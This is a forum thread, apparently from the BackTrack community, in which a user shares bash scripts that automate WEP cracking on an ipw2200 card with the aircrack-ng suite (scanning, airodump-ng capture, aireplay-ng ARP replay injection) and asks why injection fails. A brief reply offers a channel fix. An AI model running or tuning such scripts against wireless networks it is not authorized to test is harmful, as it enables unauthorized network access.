Thread: Bt4 + ipw2200

Just burned his ISO

Default Bt4 + ipw2200

i must say i am very impressed with the boot speed and the updated Aircrack-ng Suite. I have been using Backtrack since 3 beta and using versions 3, i was able to crack WEP. I have updated to the latest one and i have errors now. I have made some scripts to fasten the process but when i try to inject it doesnt work.

Here are my scripts

Code:
    #!/bin/bash
    iwlist eth1 scan
    rmmod ipw2200
    modprobe ipw2200 rtap_iface=1

echo ***********************************************************************************.
    echo ....................Welcome to the automated cracking scripts......................
    echo ......This script will automaticaly start scanning the network of your choice......
    echo ***********************************************************************************.

echo -n "Input Targets bssid (MAC Address): "
    read -e BSSID
    echo -n "Input Targets Access Point Channel: "
    read -e APC

iwconfig eth1 ap $BSSID
    iwconfig eth1 key s:fakekey mode managed
    ifconfig eth1 up
    ifconfig rtap0 up
    airodump-ng -c $APC --bssid $BSSID -w dump rtap0
    everything here works fine

Code:
    #!/bin/bash

echo .....................Welcome to the automated cracking scripts......................
    echo ..............This script will try to ARP and start capturing packets...............

read -e BSSID
    echo -n "Input Targets Clients bssid (MAC Address): "
    read -e BSSID2
    aireplay-ng --arpreplay -b $BSSID -h $BSSID2 -i rtap0 eth1
    Here is the problem. For some reason when i try to inject it doesn't work. It says im on Channel 6 but rtap0 is on 0 then quits

Code:
    #!/bin/bash

echo ....................Welcome to the automated cracking scripts......................
    echo ...........This script will decript the captured packets and get the key...........

read -e BSSID

iwconfig eth1 ap $BSSID
    aircrack-ng -z dump*.cap
    this works, no problem here

Also, when i use #1 to start capturing, i get PWR of -70 and a RXQ of OVER 90
    -----------------------------------------------------------------------------------
    Here are my newer scripts but injections still doesnt work,

Code:
    #!/bin/bash
    iwlist eth1 scan
    rmmod ipw2200
    modprobe ipw2200 rtap_iface=1
    echo ......This script will automaticaly start scanning the network of your choice......

echo -n "Input Targets essid (MAC Address): "
    read -e ESSID

echo -n "Input Targets Access Point Channel (Channel X): "
    read -e CHANNEL

ifconfig eth1 up hw ether $ESSID
    iwconfig eth1 essid $ESSID channel $CHANNEL key s:fakekey mode managed
    airodump-ng -c $CHANNEL --bssid $ESSID -w dump rtap0
    When i use this script, i get a PWR of -50~-60 and a RXQ of LESS than 60

Code:
    #!/bin/bash

echo .....................Welcome to the automated cracking scripts......................
    echo ..............This script will try to ARP and start capturing packets...............

echo -n "Input Targets essid (MAC Address): "
    read -e ESSID
    echo -n "Input Station bssid (MAC Address): "
    read -e BSSID

aireplay-ng -3 -b $ESSID -h $BSSID -i rtap0 eth1
    Can you point out what is wrong and how i can fix it and improve my scripts

Your first issue seems to be an easy fix, make sure you set rtap0 interface channel to 6 I believe.

BTW: You've posted this thread in the wrong area, its not a bug in bt4b Its moreso a feature you want to implement but its not working.

Just burned his ISO

thanks, will try soon!

i posted here because in bt3 i was able to inject some of the time and i never had the error but in bt4b i have this error. If i am truly in the wrong place, will a mod move it to the correct place.

-THankS